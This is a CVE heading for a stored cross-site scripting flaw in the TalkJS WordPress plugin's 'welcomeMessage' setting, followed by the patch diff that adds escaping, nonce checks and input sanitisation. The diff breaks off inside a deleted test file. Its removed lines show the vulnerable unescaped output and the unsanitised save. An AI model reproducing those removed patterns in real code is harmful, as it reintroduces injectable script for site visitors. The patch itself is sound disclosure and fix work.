CVE-2026-1055: TalkJS <= 0.1.15 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'welcomeMessage' Parameter (talkjs)

--- a/talkjs/classes/admin/Assets.php
+++ b/talkjs/classes/admin/Assets.php
@@ -2,6 +2,8 @@

 	namespace TalkJSAdmin;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
     use TalkJSHelpersUrl;
     use TalkJSHelpersMessages;
 	use TalkJsContractsAssetLoaderInstance;
@@ -19,11 +21,11 @@
 			add_action( 'admin_enqueue_scripts', function(){

 				$url = Url::plugin( 'assets/dist/' );
-				wp_enqueue_style( 'talkjs-admin', $url .'css/admin.css' );
+				wp_enqueue_style( 'talkjs-admin', $url .'css/admin.css', array(), TALKJS_VERSION );

-				wp_enqueue_script( 'talkjs', $url.'js/talk.js' );
-				wp_enqueue_script( 'talkjs-script', $url .'js/app.js', array( 'jquery', 'talkjs' ) );
-				wp_enqueue_script( 'crypto-js', 'https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1/crypto-js.min.js' );
+				wp_enqueue_script( 'talkjs', $url.'js/talk.js', array(), TALKJS_VERSION, true );
+				wp_enqueue_script( 'talkjs-script', $url .'js/app.js', array( 'jquery', 'talkjs' ), TALKJS_VERSION, true );
+				wp_enqueue_script( 'crypto-js', $url . 'js/crypto-js.min.js', array(), '3.1.9-1', true );

                 $object = array( 'errors' => Messages::allErrors() );
                 wp_localize_script( 'talkjs-script', 'TalkJS', $object );
--- a/talkjs/classes/admin/EventListeners.php
+++ b/talkjs/classes/admin/EventListeners.php
@@ -2,6 +2,8 @@

 	namespace TalkJSAdmin;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	use TalkJSHelpersUrl;
 	use TalkJSHelpersSettings;
 	use TalkJSHelpersMessages;
@@ -54,7 +56,7 @@

                     Settings::setOnboarding( false );

-                    wp_redirect( Url::settingsPage() );
+                    wp_safe_redirect( Url::settingsPage() );
                     exit();
                 }

--- a/talkjs/classes/admin/OnboardingPageCreator.php
+++ b/talkjs/classes/admin/OnboardingPageCreator.php
@@ -2,6 +2,8 @@

     namespace TalkJSAdmin;

+    if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
     use TalkJSHelpersUrl;
     use TalkJSHelpersUser;
     use TalkJSFacadesField;
@@ -54,9 +56,10 @@
             return array(

                 Markup::paragraph(
-                    "This plugin connects the <a href="%s" target="_blank">TalkJS user-to-user chat service</a> to your WordPress site.nn
-					<br />If you haven't yet, you need to <a href="%s" target="_blank">create a TalkJS account</a> to get your app ID and secret key.
-					<br />You can find your app ID and secret key in the <a href="%s" target="_blank">TalkJS Dashboard</a> and fill it out below.",
+                    /* translators: 1: TalkJS homepage URL, 2: TalkJS signup URL, 3: TalkJS Dashboard URL */
+                    __( "This plugin connects the <a href="%1$s" target="_blank">TalkJS user-to-user chat service</a> to your WordPress site.nn
+					<br />If you haven't yet, you need to <a href="%2$s" target="_blank">create a TalkJS account</a> to get your app ID and secret key.
+					<br />You can find your app ID and secret key in the <a href="%3$s" target="_blank">TalkJS Dashboard</a> and fill it out below.", 'talkjs' ),
                     Url::site(),
                     Url::signup(),
                     Url::dashboard()
@@ -90,17 +93,20 @@
                 ),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS Dashboard URL */
                     __( "TalkJS allows you to change most if its behavior in the <a href="%s" target="_blank">TalkJS Dashboard</a> by assigning TalkJS roles to each of your. For instance, you can fine-tune the look & feel of the chat, set up email and sms notifications, suppress contact information in user messages, and so on. nn
                     ", 'talkjs' ),
                     Url::dashboard()
                 ),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS Dashboard URL */
                     __( "You must make a "role" in the <a href="%s" target="_blank">TalkJS Dashboard</a> for every WordPress role you select below. The role in TalkJS should be the lowercase name of the roles in wordpress. For example, if you had a WordPress role 'Buyer' you need to create a role in the TalkJS dashboard named 'buyer'. <strong>Please note that some features like notifications won't start working until roles are created in the TalkJS Dashboard.</strong>", 'talkjs' ),
                     Url::dashboard()
                 ),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS documentation URL */
                     __( "If you want to learn more about roles, <a href="%s" target="_blank">check out our docs</a>.", 'talkjs' ),
                     Url::get('docs.notifications.getting_started')
 				),
--- a/talkjs/classes/admin/PluginHandler.php
+++ b/talkjs/classes/admin/PluginHandler.php
@@ -24,7 +24,7 @@

             Settings::setOnboarding();

-            wp_redirect( Url::onboardingPage() );
+            wp_safe_redirect( Url::onboardingPage() );
             exit();

         }
--- a/talkjs/classes/admin/SettingsPageCreator.php
+++ b/talkjs/classes/admin/SettingsPageCreator.php
@@ -2,6 +2,8 @@

 	namespace TalkJSAdmin;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
     use TalkJSHelpersUrl;
     use TalkJSHelpersUser;
     use TalkJSFacadesField;
@@ -47,9 +49,10 @@
 			$fields = array(

                 Markup::paragraph(
-                    __( "This plugin connects the <a href="%s">TalkJS user-to-user chat service</a> to your WordPress site.nn
+                    /* translators: 1: TalkJS homepage URL, 2: Inbox settings URL */
+                    __( "This plugin connects the <a href="%1$s">TalkJS user-to-user chat service</a> to your WordPress site.nn
                     TalkJS includes an "Inbox page", with the current user's full conversation history.
-                    We already created such a page for you, <a href="%s">set it up here</a>.", 'talkjs' ),
+                    We already created such a page for you, <a href="%2$s">set it up here</a>.", 'talkjs' ),
                     Url::site(),
                     Url::inboxPage()
                 ),
@@ -67,6 +70,7 @@
 				),

 				Markup::paragraph(
+					/* translators: %s: TalkJS Dashboard URL */
                     __( "If you want to go live with real users, go to the <a href="%s">TalkJS Dashboard</a>,
                 provide payment information, and then replace the credentials below with your new set of live-mode credentials.", 'talkjs' ),
                     Url::dashboard()
@@ -122,6 +126,7 @@
                 )),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS developer documentation URL */
                     __( "Interested in further customization? <a href="%s" target="_blank">Check our developer documentation</a>", 'talkjs' ),
                     Url::docs()
                 ),
@@ -132,17 +137,20 @@
                 ),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS Dashboard URL */
                     __( "TalkJS allows you to change most if its behavior in the <a href="%s" target="_blank">TalkJS Dashboard</a> by assigning TalkJS roles to each of your. For instance, you can fine-tune the look & feel of the chat, set up email and sms notifications, suppress contact information in user messages, and so on. nn
                     ", 'talkjs' ),
                     Url::dashboard()
                 ),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS Dashboard URL */
                     __( "You must make a "role" in the <a href="%s" target="_blank">TalkJS Dashboard</a> for every WordPress role you select below. The role in TalkJS should be the lowercase name of the roles in wordpress. For example, if you had a WordPress role 'Buyer' you need to create a role in the TalkJS dashboard named 'buyer'. <strong>Please note that some features like notifications won't start working until roles are created in the TalkJS Dashboard.</strong>", 'talkjs' ),
                     Url::dashboard()
                 ),

                 Markup::paragraph(
+                    /* translators: %s: TalkJS documentation URL */
                     __( "If you want to learn more about roles, <a href="%s" target="_blank">check out our docs</a>.", 'talkjs' ),
                     Url::get('docs.notifications.getting_started')
 				),
--- a/talkjs/classes/admin/ui/FieldBuilder.php
+++ b/talkjs/classes/admin/ui/FieldBuilder.php
@@ -87,6 +87,7 @@
 		 */
 		public function display()
 		{
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $this->render();
 		}

@@ -144,7 +145,7 @@
 			echo '>';

 				if( !is_null( $this->getValue() ) )
-					echo $this->getValue();
+					echo esc_textarea( $this->getValue() );

 			echo '</textarea>';
 		}
--- a/talkjs/classes/admin/ui/MarkupBuilder.php
+++ b/talkjs/classes/admin/ui/MarkupBuilder.php
@@ -29,6 +29,7 @@
                 $string = vsprintf( $string, $args );


+            // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
             $string = apply_filters( 'the_content', $string );
             $this->string = $string;
             return $this;
@@ -67,6 +68,7 @@
 		 */
 		public function display()
 		{
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $this->render();
 		}

--- a/talkjs/classes/admin/ui/Notifications.php
+++ b/talkjs/classes/admin/ui/Notifications.php
@@ -2,6 +2,8 @@

 	namespace TalkJSAdminUi;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	use TalkJSContractsStaticInstance;

 	class Notifications{
@@ -65,7 +67,7 @@
 				printf(
 					'<div class="%s"><p>%s</p></div>',
 					esc_attr( 'notice notice-'.$type ),
-					$notification['message']
+					wp_kses_post( $notification['message'] )
 				);

 			}
--- a/talkjs/classes/admin/ui/SettingsPage.php
+++ b/talkjs/classes/admin/ui/SettingsPage.php
@@ -1,6 +1,8 @@
 <?php
 namespace TalkJSAdminUi;

+if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 use TalkJSHelpersUser;
 use TalkJSHelpersSession;
 use TalkJSHelpersSettings;
@@ -93,11 +95,16 @@

 		if( isset( $_POST[ $this->data['form-title']  ] ) ){

+			// Check nonce before saving
+			if ( ! isset( $_POST[ Session::nonceName ] ) || ! wp_verify_nonce( sanitize_key( $_POST[ Session::nonceName ] ), Session::nonceAction ) ) {
+				wp_die( esc_html__( 'Security check failed', 'talkjs' ) );
+			}
+
 			//save all data:
 			$this->save();

 			//refresh the page:
-			wp_redirect( $this->getUrl() );
+			wp_safe_redirect( $this->getUrl() );
 			exit();
 		}

@@ -230,17 +237,14 @@
 	 */
 	public function save(){

-
-	    $nonceName = (isset($_POST[Session::nonceName])) ? $_POST[Session::nonceName] : Session::nonceName;
-	    if( !wp_verify_nonce( $nonceName, Session::nonceAction ) ) return;
-
-
 	    // Check user capability.
-	    if ( $this->check )
-	        if ( !User::can( $this->capability ) ) return;
-
+	    if ( $this->check ) {
+	        if ( ! User::can( $this->capability ) ) {
+				return;
+			}
+		}

-        $fields = array();;
+        $fields = array();
         foreach( $this->objects as $object ){
             if( method_exists( $object, 'getName' ) )
                 $fields[] = $object;
@@ -262,20 +266,15 @@
 	 * @return void
 	 */
 	public function saveFields( $fields ) {
+        $save = array();

-	    $save = array();
-
-	    foreach( $fields as $field ){
-
-			$key = $field->getName();
-	       	$value = isset( $_POST[ $key ] ) ? $_POST[ $key ] : '';
-			$save[ $key ] = $this->validate( $field, $value );
-
-			// WP auto adds backslashes for 's, we want to remove them
-			if($field->getName() === "welcomeMessage") {
-				$save[ $key ] = stripslashes($value);
-			}
+        // phpcs:disable WordPress.Security.NonceVerification.Missing, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+        foreach( $fields as $field ){
+          $key = $field->getName();
+          $value = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
+          $save[ $key ] = $this->validate( $field, $value );
         }
+        // phpcs:enable

         $optionName = Settings::optionName();
         if( isset( $this->data['options']['dataset'] ) )
--- a/talkjs/classes/chat/Manager.php
+++ b/talkjs/classes/chat/Manager.php
@@ -29,7 +29,7 @@
 		 */
 		public function renderContainer()
 		{
-			echo '<div id="talkjs-chat-container" style="' . $this->getContainerStyle() . '"></div>';
+			echo '<div id="talkjs-chat-container" style="' . esc_attr( $this->getContainerStyle() ) . '"></div>';
 		}

 	}
--- a/talkjs/classes/chat/Widget.php
+++ b/talkjs/classes/chat/Widget.php
@@ -2,6 +2,8 @@

 	namespace TalkJSChat;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	use WP_Widget;
 	use TalkJSHelpersUser;
 	use TalkJSFacadesChat;
@@ -42,8 +44,10 @@
 			$title = apply_filters( 'widget_title', $instance['title'] );

 			// before and after widget arguments are defined by themes
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $args['before_widget'];
 			if ( ! empty( $title ) )
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $args['before_title'] . esc_html( $title ) . $args['after_title'];

 			Chat::make( $instance )->display();
@@ -79,10 +83,14 @@
 		public function update( $newInstance, $oldInstance ) {

 			$instance = array();
-			$instance['title'] = ( ! empty( $newInstance['title'] ) ) ? strip_tags( $newInstance['title'] ) : '';
-			$instance['welcome'] = ( !empty( $newInstance['welcome' ] ) ) ? strip_tags( $newInstance['welcome'] ) : '';
+			$instance['title'] = ( ! empty( $newInstance['title'] ) ) ? wp_unslash( $newInstance['title'] ) : '';
+			$instance['welcome'] = ( !empty( $newInstance['welcome' ] ) ) ? wp_unslash( $newInstance['welcome'] ) : '';

-			$instance['chatWith'] = ( !empty( $newInstance['chatWith'] ) ) ? $newInstance['chatWith'] : array( 'author' );
+			if( !empty( $newInstance['chatWith'] ) ) {
+				$instance['chatWith'] = wp_unslash( $newInstance['chatWith'] );
+			} else {
+				$instance['chatWith'] = array( 'author' );
+			}

 			return $instance;

--- a/talkjs/classes/contracts/02-AjaxInstance.php
+++ b/talkjs/classes/contracts/02-AjaxInstance.php
@@ -14,8 +14,10 @@
         public function setPostGlobal(){

             global $post;
+            // phpcs:ignore WordPress.Security.NonceVerification.Missing
             if( !isset( $GLOBALS['post'] ) && isset( $_POST['post_id'] ) ){
-                $GLOBALS['post'] = new stdClass();
+                $GLOBALS['post'] = new stdClass();
+                // phpcs:ignore WordPress.Security.NonceVerification.Missing
                 $GLOBALS['post']->ID = absint( $_POST['post_id'] );
             }
         }
--- a/talkjs/classes/contracts/05-ShortcodeInstance.php
+++ b/talkjs/classes/contracts/05-ShortcodeInstance.php
@@ -2,6 +2,8 @@

 	namespace TalkJSContracts;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	class ShortcodeInstance extends StaticInstance {

         /**
--- a/talkjs/classes/frontend/Assets.php
+++ b/talkjs/classes/frontend/Assets.php
@@ -2,6 +2,8 @@

 	namespace TalkJSFront;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	use TalkJSHelpersUrl;
 	use TalkJSContractsAssetLoaderInstance;

@@ -19,7 +21,7 @@
 			add_action( 'wp_enqueue_scripts', function(){

 				$url = Url::plugin( 'assets/dist/css/talkjs.css' );
-				wp_enqueue_style( 'talkjs', $url );
+				wp_enqueue_style( 'talkjs', $url, array(), TALKJS_VERSION );

 			});

--- a/talkjs/classes/frontend/EventListeners.php
+++ b/talkjs/classes/frontend/EventListeners.php
@@ -2,6 +2,8 @@

 	namespace TalkJSFront;

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	use TalkJSFacadesInbox;
 	use TalkJSHelpersSettings;
 	use TalkJSContractsEventsInstance;
--- a/talkjs/classes/helpers/Messages.php
+++ b/talkjs/classes/helpers/Messages.php
@@ -66,15 +66,18 @@
 		{
 			return array(
 				'noApiKey' => sprintf(
+					/* translators: %s: URL to the TalkJS settings page */
 					__( 'You haven't yet provided your TalkJS app id. <a href="%s" alt="Add a TalkJS app id">Please do so here</a>', 'talkjs' ),
 					Url::settingsPage()
                 ),
                 'generalError' => __( 'There are errors on the page. Please fix these first.', 'talkjs' ),
                 'noValidKey' => sprintf(
+                    /* translators: %s: URL to the TalkJS dashboard */
                     __( 'This doesn't seem to be a valid app id and secret key combination, please check <a target="_blank" href="%s">the TalkJS dashboard.</a>', 'talkjs' ),
                     Url::dashboard()
                 ),
                 'configurationsNotSet' => sprintf(
+                    /* translators: %s: URL to the TalkJS dashboard */
                     __( 'Some roles haven't been created in TalkJS yet. <a href="%s" target="_blank">Go to the TalkJS dashboard</a> and create these roles, so e-mail notifications will work properly.', 'talkjs' ),
                     Url::dashboard()
                 ),
--- a/talkjs/classes/helpers/Session.php
+++ b/talkjs/classes/helpers/Session.php
@@ -30,10 +30,14 @@

 		global $post;

+		// phpcs:ignore WordPress.Security.NonceVerification.Recommended
 		if( isset( $_GET['post'] ) )
+			// phpcs:ignore WordPress.Security.NonceVerification.Recommended
 			return absint( $_GET['post'] );

+		// phpcs:ignore WordPress.Security.NonceVerification.Missing
 		if( isset( $_POST['post_ID'] ) )
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
 			return absint( $_POST['post_ID'] );

 		if( isset( $post ) && isset( $post->ID ) )
--- a/talkjs/classes/helpers/TemplateTags.php
+++ b/talkjs/classes/helpers/TemplateTags.php
@@ -1,5 +1,7 @@
 <?php

+	if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
+
 	/**
 	 *  Some template tag helpers that reside in the global namespace.
 	 */
@@ -19,6 +21,7 @@
 			$html = TalkJSFacadesChat::make( $props )->getHtml();

 			if( $echo )
+				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 				echo $html;

 			return $html;
@@ -40,6 +43,7 @@
 			$html = TalkJSFacadesPopup::make( $props )->getHtml();

 			if( $echo )
+				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 				echo $html;

 			return $html;
@@ -62,6 +66,7 @@
 			$html = TalkJSFacadesInbox::make( $props )->getHtml();

 			if( $echo )
+				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 				echo $html;

 			return $html;
--- a/talkjs/classes/helpers/Url.php
+++ b/talkjs/classes/helpers/Url.php
@@ -83,10 +83,10 @@

 			// Was a username or password passed?
 			if (isset($_SERVER['PHP_AUTH_USER'])) {
-			    $url .= $_SERVER['PHP_AUTH_USER'];
+			    $url .= sanitize_text_field( wp_unslash( $_SERVER['PHP_AUTH_USER'] ) );

 				if (isset($_SERVER['PHP_AUTH_PW'])) {
-					$url .= ':' . $_SERVER['PHP_AUTH_PW'];
+					$url .= ':' . sanitize_text_field( wp_unslash( $_SERVER['PHP_AUTH_PW'] ) );
 				}

 				$url .= '@';
@@ -96,21 +96,25 @@
 			// We want the user to stay on the same host they are currently on,
 			// but beware of security issues
 			// see http://shiflett.org/blog/2006/mar/server-name-versus-http-host
-			$url .= $_SERVER['HTTP_HOST'];
+			if ( isset( $_SERVER['HTTP_HOST'] ) ) {
+				$url .= sanitize_text_field( wp_unslash( $_SERVER['HTTP_HOST'] ) );
+			}

 			// Get the rest of the URL
 			if (!isset($_SERVER['REQUEST_URI'])) {
 			    // Microsoft IIS doesn't set REQUEST_URI by default
-			    $url .= $_SERVER['PHP_SELF'];
+			    if ( isset( $_SERVER['PHP_SELF'] ) ) {
+					$url .= sanitize_text_field( wp_unslash( $_SERVER['PHP_SELF'] ) );
+				}

 			    if (isset($_SERVER['QUERY_STRING'])) {
-			        $url .= '?' . $_SERVER['QUERY_STRING'];
+			        $url .= '?' . sanitize_text_field( wp_unslash( $_SERVER['QUERY_STRING'] ) );
 			    }
 			} else {
-				$url .= $_SERVER['REQUEST_URI'];
+				$url .= sanitize_text_field( wp_unslash( $_SERVER['REQUEST_URI'] ) );
 			}

-			return $url;
+			return esc_url_raw( $url );
 		}


--- a/talkjs/classes/inbox/Manager.php
+++ b/talkjs/classes/inbox/Manager.php
@@ -26,7 +26,7 @@
 		 */
 		public function renderContainer()
 		{
-			echo '<div id="talkjs-inbox-container" style="' . $this->getContainerStyle() . '"></div>';
+			echo '<div id="talkjs-inbox-container" style="' . esc_attr( $this->getContainerStyle() ) . '"></div>';
 		}

 	}
--- a/talkjs/classes/inbox/PageGenerator.php
+++ b/talkjs/classes/inbox/PageGenerator.php
@@ -60,7 +60,7 @@

 	        }else{

-	        	throw new PageGeneratorException( $response->get_error_message() );
+	        	throw new PageGeneratorException( esc_html( $response->get_error_message() ) );

 	        }
 		}
@@ -114,12 +114,7 @@
 		 */
 		public function exists()
 		{
-			global $wpdb;
-
-	        if ( $wpdb->get_var( $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE ID = %d LIMIT 1;", $this->pageId ) ) > 0 )
-	            return true;
-
-	        return false;
+			return (bool) get_post( $this->pageId );
 		}

 	}
 No newline at end of file
--- a/talkjs/classes/popup/Manager.php
+++ b/talkjs/classes/popup/Manager.php
@@ -15,6 +15,7 @@
 		public function render()
 		{
 			$this->setConversation();
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $this->getPopupMountSnippet();

 		}
--- a/talkjs/classes/traits/ImplementsTalkSession.php
+++ b/talkjs/classes/traits/ImplementsTalkSession.php
@@ -79,6 +79,7 @@
 		 */
 		public function display()
 		{
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $this->getHtml();
 		}

@@ -114,19 +115,24 @@

 			//only render the include script if it's not yet outputted on the page:
 			if( !$talkjs_session )
+				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 				echo $this->includeScript();
 			?>
 			<script>
 			Talk.ready.then(function() {

-				var me = new Talk.User(<?php echo $encoded_user;?>);
+				var me = new Talk.User(<?php
+					// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+					echo $encoded_user;
+				?>);

 				window.talkSession = new Talk.Session({
-					appId: '<?php echo esc_html( $this->appId );?>',
+					appId: '<?php echo esc_js( $this->appId );?>',
 					me: me,
 					<?php
 						if ( isset($user['id']) && isset($this->secretKey) ) {
 							$user_signature = hash_hmac('sha256', strval($user['id']), $this->secretKey);
+							// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 							echo "signature: '" . $user_signature . "'";
 						}
 					?>
--- a/talkjs/classes/traits/MakesConversation.php
+++ b/talkjs/classes/traits/MakesConversation.php
@@ -18,6 +18,7 @@
 			$type = $this->getProp( 'userType' );
 			$_user = $this->getProp( 'user', null );
 			$user = json_encode( User::getTalkObject( $type, $_user ) );
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo "var user = new Talk.User({$user});";

 			$topicId = $this->getProp( 'topicid' );
@@ -34,8 +35,10 @@

 			if (count($options) > 0) {
 				$options = json_encode($options);
+				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 				echo 'var conversation = talkSession.getOrStartConversation(user, ' . $options . ');';
 			} else {
+				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 				echo 'var conversation = talkSession.getOrStartConversation(user);';
 			}
 		}
--- a/talkjs/classes/traits/RendersHtml.php
+++ b/talkjs/classes/traits/RendersHtml.php
@@ -33,6 +33,7 @@
 		 */
 		public function display()
 		{
+			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			echo $this->getHtml();
 		}

--- a/talkjs/talkjs.php
+++ b/talkjs/talkjs.php
@@ -6,7 +6,9 @@
  * Author:          TalkJS
  * Text Domain:     talkjs
  * Domain Path:     /languages
- * Version:         0.1.15
+ * Version:         0.1.16
+ * License:         GPLv2 or later
+ * License URI:     http://www.gnu.org/licenses/gpl-2.0.html
  *
  * @package         TalkJS
  */
@@ -17,6 +19,9 @@
 // The directory separator.
 defined('DS') ? DS : define('DS', DIRECTORY_SEPARATOR);

+// The plugin version.
+define( 'TALKJS_VERSION', '0.1.16' );
+

 /**
  * Main class that bootstraps the plugin.
@@ -205,36 +210,3 @@
 register_activation_hook( __FILE__, function(){
     update_option( 'talkjs_activated', 'talkjs' );
 });
-
-
-/**
- * Print_R in a <pre> tag
- */
-if( !function_exists( 'dump' ) ){
-    function dump( $arr ){
-        echo '<pre>';
-            print_r( $arr );
-        echo '</pre>';
-    }
-}
-
-/**
- * Print_R in a <pre> tag and die
- */
-if( !function_exists( 'dd' ) ){
-    function dd( $arr ){
-        dump( $arr );
-        die();
-    }
-}
-
-/**
- * Print_R in inside a comment block so it doesn't break JS on the page
- */
-if( !function_exists( 'dumpSafe' ) ){
-    function dumpSafe( $arr ){
-        echo '/**';
-            print_r( $arr );
-        echo '*//';
-    }
-}
--- a/talkjs/tests/bootstrap.php
+++ b/talkjs/tests/bootstrap.php
@@ -1,26 +0,0 @@
-<?php
-/**
- * PHPUnit bootstrap file
- *
- * @package TalkJS
- */
-
-$_tests_dir = getenv( 'WP_TESTS_DIR' );
-if ( ! $_tests_dir ) {
-	$_tests_dir = '/tmp/wordpress-tests-lib';
-}
-
-
-// Give access to tests_add_filter() function.
-require_once $_tests_dir . '/includes/functions.php';
-
-/**
- * Manually load the plugin being tested.
- */
-function _manually_load_plugin() {
-	require dirname( dirname( __FILE__ ) ) . '/talkjs.php';
-}
-tests_add_filter( 'muplugins_loaded', '_manually_load_plugin' );
-
-// Start up the WP testing environment.
-require $_tests_dir . '/includes/bootstrap.php';
--- a/talkjs/tests/test-a-base-class.php
+++ b/talkjs/tests/test-a-base-class.php
@@ -1,38 +0,0 @@
-<?php
-
-	/**
-	 * Base Tests
-	 */
-	class BaseTest extends WP_UnitTestCase {
-
-		/**
-		 * Authenticate a new user
-		 *
-		 * @return void
-		 */
-		public function auth( $role = 'administrator' )
-		{
-			wp_set_current_user( self::factory()->user->create( [
-	            'role' => $role,
-    	    ]) );
-		}
-
-
-		/**
-		 * Log a user out
-		 *
-		 * @return void
-		 */
-		public function logout()
-		{
-			wp_logout();
-		}
-
-
-		/** Test */
-		public function test_dd_is_an_existing_function()
-		{
-			$this->assertTrue( function_exists( 'dd' ) );
-		}
-
-	}
 No newline at end of file
--- a/talkjs/tests/test-api.php
+++ b/talkjs/tests/test-api.php
@@ -1,47 +0,0 @@
-<?php
-/**
- * Class ApiTests
- *
- * @package TalkJS
- */
-
-use TalkJSHelpersSettings;
-use TalkJSHelpersMessages;
-use TalkJSAdminUiNotifications;
-
-/**
- * Api Tests
- */
-class ApiTests extends WP_UnitTestCase {
-
-	/**
-	 * A notification gets displayed if there's no api-key setting
-	 */
-	function test_it_can_give_a_notification_warning() {
-
-		if( Settings::get( 'apikey' ) == false ){
-
-			$notifications = new Notifications();
-
-			$notifications->add( Messages::noApiKey(), 'warning' );
-			$count = $notifications->getNotificationCount( 'warning' );
-
-			//check if the notification is set:
-			$this->assertEquals( $count, 1 );
-
-
-			ob_start();
-
-				$notifications->displayNotifications( 'warning' );
-
-			$string = ob_get_clean();
-
-			//check if the notification get's displayed
-			$this->assertContains( Messages::noApiKey(), $string );
-		}
-	}
-
-
-
-
-}
--- a/talkjs/tests/test-chat.php
+++ b/talkjs/tests/test-chat.php
@@ -1,196 +0,0 @@
-<?php
-/**
- * Class ChatTest
- *
- * @package TalkJS
- */
-
-use TalkJSFacadesChat;
-use TalkJSHelpersUser;
-use TalkJSHelpersSettings;
-
-/**
- * Chat Tests
- */
-class ChatTests extends BaseTest {
-
-
-	/** Test */
-	public function test_it_has_a_render_method()
-	{
-		$this->assertTrue( method_exists( 'TalkJSChatManager', 'render' ) );
-	}
-
-
-	/** Test */
-	function test_it_checks_if_the_user_is_logged_in()
-	{
-
-		$this->getChatbox();
-		Settings::set( 'mustBeLoggedIn', true );
-
-		//it should be valid now:
-		$this->assertTrue( Chat::isValid() );
-
-		$this->logout();
-		Settings::set( 'mustBeLoggedIn', false );
-
-		//it should still be valid now:
-		$this->assertTrue( Chat::isValid() );
-
-	}
-
-
-	/** Test */
-	function test_it_creates_a_conversation()
-	{
-		$chat = $this->getChatbox();
-		$this->assertContains( 'var user = new Talk.User', $chat->getHtml() );
-	}
-
-
-	/** Test */
-	function test_it_has_a_defined_user_type()
-	{
-		$chat = $this->getChatbox();
-		$this->assertNotNull( $chat->getProp( 'userType' ) );
-	}
-
-
-	/** Test */
-	function test_it_has_a_default_user_type()
-	{
-		//default:
-		$chat = $this->getChatbox();
-		$this->assertEquals( $chat->getProp( 'userType' ), 'author' );
-	}
-
-
-	/** Test */
-	function test_it_formats_user_data_properly(){
-
-        $author = $this->makeAuthor();
-        $roles = $author->roles;
-        $role = array_shift( $roles );
-
-		$authorData = [
-            'id' => $author->data->ID,
-            'name' => $author->data->display_name,
-            'email' => $author->data->user_email,
-            'photoUrl' => get_avatar_url( $author->data->ID ),
-            'role' => $role
-        ];
-
-		$this->assertEquals( User::getTalkObject( 'author'), $authorData );
-	}
-
-
-	/** Test */
-	function test_it_adds_the_author_in_a_conversation()
-	{
-
-		$author = $this->makeAuthor();
-		$chat = $this->getChatbox();
-		$json = json_encode( User::getTalkObject('author') );
-
-		//check if the json is added to the html:
-		$this->assertContains( $json, $chat->getHtml() );
-	}
-
-
-	/** Test */
-	/*function test_it_defaults_to_the_chosen_user_if_there_is_no_author()
-	{
-		$chat = $this->getChatbox(); //without author
-		$json = json_encode( User::getTalkObject('author') );
-		$json2 = json_encode( User::getTalkObject('userId', Settings::get( 'defaultUser' ) ) );
-
-		$this->assertEquals( $json, $json2 );
-		$this->assertContains( $json, $chat->getHtml() );
-	}*/
-
-
-
-	/** Test */
-	function test_it_can_take_a_user_as_a_conversation_user()
-	{
-		$this->setSettings();
-
-		//create a user:
-		$user = self::factory()->user->create( [
-	        'role' => 'administrator',
-    	]);
-
-		//add it as a user:
-		$chat = Chat::make([ 'userType' => 'userId', 'user' => $user ]);
-
-		//check the properties:
-		$this->assertEquals( $chat->getProp( 'userType' ), 'userId' );
-		$this->assertNotNull( $chat->getProp( 'user' ) );
-
-		//check the json
-		$json = json_encode( User::getTalkObject( 'userId', $user ) );
-		$userJson = substr( json_encode( ['id' => (string)$user ] ), 0, -1 );//remove the lingering }
-
-		//check if the initial json is correct:
-		$this->assertContains( $userJson, $json );
-
-		//check if the json is added to the html:
-		$this->assertContains( $json, $chat->getHtml() );
-	}
-
-
-	/** Test */
-	function test_it_outputs_the_the_chatbox_javascript()
-	{
-		$chat = $this->getChatbox();
-		$this->assertContains( 'talkSession.createChatbox(conversation)', $chat->getHtml() );
-		$this->assertContains( 'chatbox.mount(document.getElementById("talkjs-chat-container"))', $chat->getHtml() );
-		$this->assertContains( '<div id="talkjs-chat-container"', $chat->getHtml() );
-	}
-
-
-	/**
-	 * Populate the settings with test data, and return a Chatbox instance
-	 *
-	 * @return TalkJSChatManager
-	 */
-	public function getChatbox()
-	{
-		$this->setSettings();
-
-		$chat = Chat::make();
-		return $chat;
-	}
-
-
-	/**
